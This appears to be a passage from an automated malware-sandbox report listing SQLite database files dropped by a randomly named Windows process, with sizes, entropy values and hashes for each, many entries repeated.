                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
